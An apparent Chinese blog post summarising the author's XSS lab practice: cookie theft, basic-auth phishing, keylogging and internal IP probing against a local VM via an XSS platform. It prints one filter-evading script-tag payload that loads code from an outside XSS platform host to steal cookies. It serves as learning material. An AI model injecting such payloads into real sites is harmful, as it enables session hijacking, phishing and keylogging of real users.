zoukankan      html  css  js  c++  java
  • XSS这段时间的学习总结

    0X01利用平台payload获取COOKIE

    本机IP 192.168.1.100

    靶机win7 192.168.1.102

    我们先创建一个cookie的项目

    然后在可以执行xss的地方插入我们的恶意代码

    </tExtArEa>'"><sCRiPt sRC=https://xsshs.cn/JBYE></sCrIpT>

    可以看见成功回显

    0X02基础认证钓鱼

    这里因为回家了 所以ip变化了一下

    本机 192.168.1.10

    靶机 192.168.1.2

    这是我们的平台的地址

    http://xss.fbisb.com/xss.php?do=module&act=view&id=15

    我们一样先建一个项目 然后对靶机进行钓鱼

    然后输入后 我们返回来看我们的项目

    成功钓鱼

    0X03XSS键盘记录仪

    还是先创建一个项目

    然后 在可以植入XSS的地方植入XSS代码

     成功获取键盘记录

    0X04内网IP探测

    创建项目

    然后一样插入到可以执行js的地方

     

  • 相关阅读:
    Java 抽象类
    7.队列的链表实现
    6.队列的数组实现
    5.栈的链表实现
    4.栈的数组实现
    3.线性表-cursor
    2.线性表-Linked list
    1.线性表-Array
    hello world!
    boost 大小端转换
  • 原文地址:https://www.cnblogs.com/-zhong/p/10986399.html
Copyright © 2011-2022 走看看